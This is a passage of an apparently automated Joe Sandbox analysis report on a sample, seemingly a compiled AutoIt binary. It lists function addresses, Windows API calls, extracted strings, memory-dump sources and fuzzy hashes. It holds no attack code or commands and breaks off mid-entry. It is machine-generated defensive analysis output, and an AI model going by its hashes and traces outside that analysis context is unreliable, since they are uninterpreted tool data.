                            • Opcode Fuzzy Hash: caa711ada5a1c798bb9b0a8201b9c6f8136dc64ed74cc16e81575b16ea2a5152
                            • Instruction Fuzzy Hash: F221087294021EAFCF11AF90CC4AEEE7779FF18300F044465B515A61A2EB71A658DB71
                            Function 00DA52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                              • Part of subcall function 00D47924: _memmove.LIBCMT ref: 00D479AD
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DA5330
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DA5346
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DA5357
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DA5369
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DA537A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: dd649cfff64b4a654f89808b9ea046efa57385c8ecaea3dc2b9685a38c6f24c3
                            • Instruction ID: 0065f1765f2f3761642bbb8454557e3aff15c7bf7fc0b900967e321f8eda1b5f
                            • Opcode Fuzzy Hash: dd649cfff64b4a654f89808b9ea046efa57385c8ecaea3dc2b9685a38c6f24c3
                            • Instruction Fuzzy Hash: 0911633195015E7EDB20B761DC49EFFAA7CEBD1B40F0404197511920D5DEA01908C9B1
                            Function 00DA46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: f0861cea4ee491d028c3ff05c767dfc7c921444efca47e2cad2b62efdd40e446
                            • Instruction ID: b651b56931a22957dfe3246aca87723afdcd91433ceb59b6e15c06738f4a8a76
                            • Opcode Fuzzy Hash: f0861cea4ee491d028c3ff05c767dfc7c921444efca47e2cad2b62efdd40e446
                            • Instruction Fuzzy Hash: EC11D571500215AFCB10AB309C46EEA77BCEF43721F0441B6F445D6191EFB1C9818AB1
                            Function 00D43015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43074
                            • RegisterClassExW.USER32(00000030), ref: 00D4309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                            • LoadIconW.USER32 ref: 00D430F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: 3193b14cdea9cece94cd2293cf5924ff606853b8aa171bfa905033358c0c4f47
                            • Instruction ID: d67b05d1cbf980e6dfd8449ef5092c727f68d0365ad7ad4067a2526325ac0a80
                            • Opcode Fuzzy Hash: 3193b14cdea9cece94cd2293cf5924ff606853b8aa171bfa905033358c0c4f47
                            • Instruction Fuzzy Hash: 2B312B7284134A9FDB51CFA4D889BCEBBF1FB09310F14452EE580E62A0D3B60589CF61
                            Function 00DA4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 00DA4F7A
                              • Part of subcall function 00D6049F: timeGetTime.WINMM ref: 00D604A3
                            • Sleep.KERNEL32(0000000A), ref: 00DA4FA6
                            • EnumThreadWindows.USER32 ref: 00DA4FCA
                            • FindWindowExW.USER32 ref: 00DA4FEC
                            • SetActiveWindow.USER32 ref: 00DA500B
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DA5019
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DA5038
                            • Sleep.KERNEL32(000000FA), ref: 00DA5043
                            • IsWindow.USER32 ref: 00DA504F
                            • EndDialog.USER32 ref: 00DA5060
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: bea8bc89ebeafde76e2d7bd6392dd3d9b7f22f8684af164783a9cc3428539d4c
                            • Instruction ID: 39f4515a68f78be731d8b1e98bfe562e63530b46d00061b5425af204da3f7662
                            • Opcode Fuzzy Hash: bea8bc89ebeafde76e2d7bd6392dd3d9b7f22f8684af164783a9cc3428539d4c
                            • Instruction Fuzzy Hash: 0B218E71244706AFE7105F21EC89F663BBBEB46745F181424F201D62B5CBB28DA49B72
                            Function 00D43041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43074
                            • RegisterClassExW.USER32(00000030), ref: 00D4309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                            • LoadIconW.USER32 ref: 00D430F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: 3ca2158c5370d53e12f8745a43db4cc3e1cbc6b38608f468efda476f9935ab5f
                            • Instruction ID: 48097ee1283891e32fec36e00ba0087c01191ebdfb4aee6cb805e5fe4e40b627
                            • Opcode Fuzzy Hash: 3ca2158c5370d53e12f8745a43db4cc3e1cbc6b38608f468efda476f9935ab5f
                            • Instruction Fuzzy Hash: 3B21CDB290171AAFDB00DF95E849BDE7BF5FB08700F10812AF911E63A0D7B245848FA5
                            Function 00DAD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CoInitialize.OLE32(00000000), ref: 00DAD5EA
                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DAD67D
                            • SHGetDesktopFolder.SHELL32(?), ref: 00DAD691
                            • CoCreateInstance.OLE32(00DD2D7C,00000000,00000001,00DF8C1C,?), ref: 00DAD6DD
                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DAD74C
                            • CoTaskMemFree.OLE32(?), ref: 00DAD7A4
                            • _memset.LIBCMT ref: 00DAD7E1
                            • SHBrowseForFolderW.SHELL32(?), ref: 00DAD81D
                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DAD840
                            • CoTaskMemFree.OLE32(00000000), ref: 00DAD847
                            • CoTaskMemFree.OLE32(00000000), ref: 00DAD87E
                            • CoUninitialize.OLE32 ref: 00DAD880
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                            • String ID:
                            • API String ID: 1246142700-0
                            • Opcode ID: 771810bdec8fefc7b2f4a16f2bbfdc3c9c2da75da627ded31b3cc67e33a3994c
                            • Instruction ID: a08f1ebf46c486bdd817dfe17eb49e34cff7029e93e105f72fc5f5d65575f215
                            • Opcode Fuzzy Hash: 771810bdec8fefc7b2f4a16f2bbfdc3c9c2da75da627ded31b3cc67e33a3994c
                            • Instruction Fuzzy Hash: 5BB1FC75A00209AFDB14DFA4C894DAEBBB9FF49314F148469F90ADB261DB30ED45CB60
                            Function 00D9C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 00D9C283
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C295
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D9C2F3
                            • GetDlgItem.USER32(?,00000002), ref: 00D9C2FE
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C310
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D9C364
                            • GetDlgItem.USER32(?,000003E9), ref: 00D9C372
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C383
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D9C3C6
                            • GetDlgItem.USER32(?,000003EA), ref: 00D9C3D4
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D9C3F1
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D9C3FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 16643ddd463b24408814299e9074c7cc95dc007c625de9eb7475793beaa5f7d8
                            • Instruction ID: d303c606a72a32c58a1f753ed2a9847674f45bb7e590391ac641f97c81333c9e
                            • Opcode Fuzzy Hash: 16643ddd463b24408814299e9074c7cc95dc007c625de9eb7475793beaa5f7d8
                            • Instruction Fuzzy Hash: 33511B71B50206ABDF18CFA9DD99EAEBBBAEB88711F148129F515D6390D7709D008B20
                            Function 00D4201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D41B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00D41B9A
                            • DestroyWindow.USER32 ref: 00D420D3
                            • KillTimer.USER32 ref: 00D4216E
                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCA6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCD7
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCEE
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BD0A
                            • DeleteObject.GDI32(00000000), ref: 00D7BD1C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID:
                            • API String ID: 641708696-0
                            • Opcode ID: 927a122e8e6dc428067dc8ae15531e308197e02f3957ffe163ea3d9dc30b107c
                            • Instruction ID: 639c1e3f25f644fca8614bdd3ba4baa8983091dd656d7f805d6f2556d05d63dc
                            • Opcode Fuzzy Hash: 927a122e8e6dc428067dc8ae15531e308197e02f3957ffe163ea3d9dc30b107c
                            • Instruction Fuzzy Hash: A8618C32100B11DFCB399F15D948B3A77F2FB50312F98852AE5869BAA0C771A885DF70
                            Function 00D421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 00D421D3
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID:
                            • API String ID: 259745315-0
                            • Opcode ID: 37074851d85709337276fbe80a415180d692c92a2698661919646107c709c241
                            • Instruction ID: c98c00c7c379b8f2f7793328af9dc905cb2cf07bc0d0245181c60eef8742387c
                            • Opcode Fuzzy Hash: 37074851d85709337276fbe80a415180d692c92a2698661919646107c709c241
                            • Instruction Fuzzy Hash: D1418231000651DFDB255F28EC88BB93B66EB06331F9C8265FE658A2E5D7718C41DB35
                            Function 00DAA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DAA90B
                            • GetDriveTypeW.KERNEL32(00000061,00DF89A0,00000061), ref: 00DAA9D5
                            • _wcscpy.LIBCMT ref: 00DAA9FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy
                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 2820617543-1000479233
                            • Opcode ID: d316922d50c12a7361005638abb9c84270e5c61158d7c8dcd213c176f6863207
                            • Instruction ID: edae457aed83f41cd99f03150060c32ad07c3d1d398c27eb1073db43a3085733
                            • Opcode Fuzzy Hash: d316922d50c12a7361005638abb9c84270e5c61158d7c8dcd213c176f6863207
                            • Instruction Fuzzy Hash: 64519B311083019BC700EF18C892AAFB7E9EF85344F554A2DF596972A2DB71D909CE73
                            Function 00D49837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __i64tow__itow__swprintf
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 421087845-2263619337
                            • Opcode ID: d9cf0b0748e27df93b3009fc4383b248d40d09af4e6a15dd9c5d975fdff39d63
                            • Instruction ID: ba08bdf5fab13cc9a2aa5a4319352758ffc02cd51ddf4278280fe40dd21e2ffb
                            • Opcode Fuzzy Hash: d9cf0b0748e27df93b3009fc4383b248d40d09af4e6a15dd9c5d975fdff39d63
                            • Instruction Fuzzy Hash: 0D41D471604205AFDB24DF79D842E7AB7E8EF45310F28846EE589D7292FA31D9018B31
                            Function 00DC7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0$F
                            • API String ID: 176399719-3044882817
                            • Opcode ID: f71d818ed08d5300c5d88ec0075c6c026132d65b97d33abeafcac064cde0fe80
                            • Instruction ID: 21287d08c895f2036437cb45d1c1c991c0405078e03ecb54808ebf9793b0287c
                            • Opcode Fuzzy Hash: f71d818ed08d5300c5d88ec0075c6c026132d65b97d33abeafcac064cde0fe80
                            • Instruction Fuzzy Hash: 21414575A01206AFDB20DFA4D888FDABBB5FB48310F184129FA45A7360D731A910CFA4
                            Function 00DC74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                            Download Yara Rule
                            APIs
                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 00DC755E
                            • CreateCompatibleDC.GDI32(00000000), ref: 00DC7565
                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DC7578
                            • SelectObject.GDI32(00000000,00000000), ref: 00DC7580
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DC758B
                            • DeleteDC.GDI32(00000000), ref: 00DC7594
                            • GetWindowLongW.USER32(?,000000EC), ref: 00DC759E
                            • SetLayeredWindowAttributes.USER32 ref: 00DC75B2
                            • DestroyWindow.USER32 ref: 00DC75BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                            • String ID: static
                            • API String ID: 2559357485-2160076837
                            • Opcode ID: fb7b9c794966ac86f5ebd7b18c13eeba7c339c21c400fca8a44356cc0f49115b
                            • Instruction ID: 1971b5d3c2160a939df05428b01a9c6a59d96e2e7b533099c99e1fa9a59db8dd
                            • Opcode Fuzzy Hash: fb7b9c794966ac86f5ebd7b18c13eeba7c339c21c400fca8a44356cc0f49115b
                            • Instruction Fuzzy Hash: 70316872104216ABDF129F64DC09FEB3B6AFF09760F150229FA55E62A0C731D821DBB4
                            Function 00D66E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D66E3E
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • __gmtime64_s.LIBCMT ref: 00D66ED7
                            • __gmtime64_s.LIBCMT ref: 00D66F0D
                            • __gmtime64_s.LIBCMT ref: 00D66F2A
                            • __allrem.LIBCMT ref: 00D66F80
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D66F9C
                            • __allrem.LIBCMT ref: 00D66FB3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D66FD1
                            • __allrem.LIBCMT ref: 00D66FE8
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D67006
                            • __invoke_watson.LIBCMT ref: 00D67077
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                            • Instruction ID: ec1d00ff1d8c782c042de58b8339880c7f2ff22ec13e2f58b305c529d5bf51c8
                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                            • Instruction Fuzzy Hash: BB71D576A00716ABD714EE69DC42B6AB7B8EF04724F14862AF514E7281F771D9008BB0
                            Function 00DA2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DA2542
                            • GetMenuItemInfoW.USER32 ref: 00DA25A3
                            • SetMenuItemInfoW.USER32 ref: 00DA25D9
                            • Sleep.KERNEL32(000001F4), ref: 00DA25EB
                            • GetMenuItemCount.USER32(?), ref: 00DA262F
                            • GetMenuItemID.USER32(?,00000000), ref: 00DA264B
                            • GetMenuItemID.USER32(?,-00000001), ref: 00DA2675
                            • GetMenuItemID.USER32(?,?), ref: 00DA26BA
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DA2700
                            • GetMenuItemInfoW.USER32 ref: 00DA2714
                            • SetMenuItemInfoW.USER32 ref: 00DA2735
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
